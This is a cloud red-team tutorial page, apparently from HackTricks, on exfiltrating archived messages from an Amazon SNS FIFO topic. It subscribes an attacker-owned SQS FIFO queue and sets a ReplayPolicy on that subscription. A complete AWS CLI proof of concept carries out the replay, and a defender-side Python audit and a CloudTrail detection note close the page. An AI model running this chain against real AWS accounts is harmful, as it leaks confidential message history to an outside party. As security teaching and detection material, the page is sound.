SNS FIFO Archive Replay Exfiltration via Attacker SQS FIFO Subscription


tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Abuse of Amazon SNS FIFO topic message archiving to replay and exfiltrate previously published messages to an attacker-controlled SQS FIFO queue by setting a ReplayPolicy on the subscription.

  • Services: Amazon SNS (FIFO topics) + Amazon SQS (FIFO queues)
  • Requirements: the topic must have an ArchivePolicy enabled (message archiving). The attacker can Subscribe to the topic and set attributes on their own subscription. The attacker controls an SQS FIFO queue and allows the topic to send messages to it.
  • Impact: historical messages (published before the subscription existed) can be delivered to the attacker endpoint. Replayed deliveries are marked with Replayed=true in the SNS envelope.

Prerequisites

  • SNS FIFO topic with archiving enabled: ArchivePolicy (for example, { "MessageRetentionPeriod": "2" } for 2 days).
  • The attacker has the following permissions:
    • sns:Subscribe on the target topic.
    • sns:SetSubscriptionAttributes on the created subscription.
  • The attacker owns an SQS FIFO queue and can attach a queue policy that allows sns:SendMessage from the topic ARN.

Minimum IAM permissions

  • On the topic: sns:Subscribe.
  • On the subscription: sns:SetSubscriptionAttributes.
  • On the queue: sqs:SetQueueAttributes to attach the policy, plus a queue policy that allows sns:SendMessage from the topic ARN.

Attack: Replay archived messages to attacker SQS FIFO

The attacker subscribes their SQS FIFO queue to the victim SNS FIFO topic, then sets a ReplayPolicy with a timestamp in the past (within the archive retention window). SNS immediately replays the matching archived messages to the new subscription and marks them with Replayed=true.

Notes:

  • The timestamp used in ReplayPolicy must be >= the topic's BeginningArchiveTime. If it is earlier, the API returns "Invalid StartingPoint value".
  • For SNS FIFO Publish you must supply a MessageGroupId (and either a deduplication ID or enable ContentBasedDeduplication on the topic).

End-to-end CLI POC (us-east-1)

```bash
REGION=us-east-1
# Compute a starting point; adjusted later to >= BeginningArchiveTime if needed
TS_START=$(python3 - << 'PY'
from datetime import datetime, timezone, timedelta
print((datetime.now(timezone.utc) - timedelta(minutes=15)).strftime('%Y-%m-%dT%H:%M:%SZ'))
PY
)

# 1) Create SNS FIFO topic with archiving (2-day retention)
TOPIC_NAME=htreplay$(date +%s).fifo
TOPIC_ARN=$(aws sns create-topic --region "$REGION" \
  --cli-input-json '{"Name":"'"$TOPIC_NAME"'","Attributes":{"FifoTopic":"true","ContentBasedDeduplication":"true","ArchivePolicy":"{\"MessageRetentionPeriod\":\"2\"}"}}' \
  --query TopicArn --output text)

echo "Topic: $TOPIC_ARN"

# 2) Publish a few messages BEFORE subscribing (FIFO requires MessageGroupId;
#    ContentBasedDeduplication on the topic supplies the dedup ID)
for i in $(seq 1 3); do
  aws sns publish --region "$REGION" --topic-arn "$TOPIC_ARN" \
    --message "{\"orderId\":$i,\"secret\":\"ssn-123-45-678$i\"}" \
    --message-group-id g1 >/dev/null
done

# 3) Create attacker SQS FIFO queue and allow only this topic to send
Q_URL=$(aws sqs create-queue --queue-name ht-replay-exfil-q-$(date +%s).fifo \
  --attributes FifoQueue=true --region "$REGION" --query QueueUrl --output text)
export Q_URL   # the python3 heredoc below reads it from the environment
Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region "$REGION" \
  --attribute-names QueueArn --query Attributes.QueueArn --output text)

cat > /tmp/ht-replay-sqs-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AllowSNSSend","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"sqs:SendMessage","Resource":"$Q_ARN","Condition":{"ArnEquals":{"aws:SourceArn":"$TOPIC_ARN"}}}]}
JSON
# Use CLI input JSON to avoid shell quoting issues with the embedded policy
aws sqs set-queue-attributes --region "$REGION" --cli-input-json "$(python3 - << 'PY'
import json, os
print(json.dumps({
    'QueueUrl': os.environ['Q_URL'],
    'Attributes': {'Policy': open('/tmp/ht-replay-sqs-policy.json').read()}
}))
PY
)"

# 4) Subscribe the queue to the topic
SUB_ARN=$(aws sns subscribe --region "$REGION" --topic-arn "$TOPIC_ARN" \
  --protocol sqs --notification-endpoint "$Q_ARN" --query SubscriptionArn --output text)

echo "Subscription: $SUB_ARN"

# 5) Ensure StartingPoint is >= BeginningArchiveTime
#    (--output text prints the literal string "None" when the attribute is absent)
BEGIN=$(aws sns get-topic-attributes --region "$REGION" --topic-arn "$TOPIC_ARN" \
  --query Attributes.BeginningArchiveTime --output text)
START=${TS_START}
if [ -n "$BEGIN" ] && [ "$BEGIN" != "None" ]; then START="$BEGIN"; fi

aws sns set-subscription-attributes --region "$REGION" --subscription-arn "$SUB_ARN" \
  --attribute-name ReplayPolicy \
  --attribute-value "{\"PointType\":\"Timestamp\",\"StartingPoint\":\"$START\"}"

# 6) Receive replayed messages (note Replayed=true in the SNS envelope)
aws sqs receive-message --queue-url "$Q_URL" --region "$REGION" \
  --max-number-of-messages 10 --wait-time-seconds 10 \
  --message-attribute-names All --attribute-names All
```

Impact

Potential impact: an attacker who can subscribe to an SNS FIFO topic with archiving enabled and set a ReplayPolicy on their subscription can immediately replay and exfiltrate historical messages published to that topic, not only messages published after the subscription was created. Delivered messages carry the Replayed=true flag in the SNS envelope.
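As an added defender-side example (not from the original page), a pure-Python audit over topic and subscription attribute maps in the shape `aws sns get-topic-attributes` / `aws sns get-subscription-attributes` return: it flags subscriptions on archiving-enabled topics that already carry a ReplayPolicy, rated higher when the endpoint sits in another account, and notes foreign subscribers that could set one later. The account IDs, names and timestamps in the inventory are constructed.

```python
import json

# Constructed sample inventory (assumed account IDs and names), shaped like the
# Attributes maps the SNS get-topic-attributes / get-subscription-attributes calls return.
TOPICS = {
    "arn:aws:sns:us-east-1:111111111111:orders.fifo": {
        "FifoTopic": "true",
        "ArchivePolicy": '{"MessageRetentionPeriod":"2"}',
        "BeginningArchiveTime": "2024-05-01T00:00:00Z",
    },
    "arn:aws:sns:us-east-1:111111111111:alerts.fifo": {"FifoTopic": "true"},
}
SUBSCRIPTIONS = [
    {  # cross-account queue that has already requested a replay of the archive
        "SubscriptionArn": "arn:aws:sns:us-east-1:111111111111:orders.fifo:s1",
        "TopicArn": "arn:aws:sns:us-east-1:111111111111:orders.fifo",
        "Endpoint": "arn:aws:sqs:us-east-1:222222222222:exfil.fifo",
        "ReplayPolicy": '{"PointType":"Timestamp","StartingPoint":"2024-05-01T00:00:00Z"}',
    },
    {  # in-account consumer with no ReplayPolicy: only receives new messages
        "SubscriptionArn": "arn:aws:sns:us-east-1:111111111111:orders.fifo:s2",
        "TopicArn": "arn:aws:sns:us-east-1:111111111111:orders.fifo",
        "Endpoint": "arn:aws:sqs:us-east-1:111111111111:orders-worker.fifo",
    },
]

def account_of(arn):
    """The account ID is the fifth colon-separated field of an ARN."""
    return arn.split(":")[4]

def audit(topics, subscriptions):
    """One finding per subscription that can pull archived history off a topic."""
    findings = []
    for sub in subscriptions:
        topic = topics.get(sub["TopicArn"], {})
        if "ArchivePolicy" not in topic:
            continue  # no archive, so a ReplayPolicy cannot surface old messages
        cross = account_of(sub["Endpoint"]) != account_of(sub["TopicArn"])
        replay = sub.get("ReplayPolicy")
        if replay:  # history already requested; worst when it leaves the account
            start = json.loads(replay).get("StartingPoint")
            findings.append({"subscription": sub["SubscriptionArn"],
                             "severity": "HIGH" if cross else "MEDIUM",
                             "reason": f"replay from {start}, archive begins {topic['BeginningArchiveTime']}"})
        elif cross:  # a foreign subscriber could set ReplayPolicy at any time
            findings.append({"subscription": sub["SubscriptionArn"], "severity": "LOW",
                             "reason": "cross-account subscriber on an archived topic"})
    return findings
```

In a real account the two maps would be filled from ListTopics/ListSubscriptions plus the corresponding Get*Attributes calls; a CloudTrail SetSubscriptionAttributes event with attribute name ReplayPolicy is the matching real-time signal.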
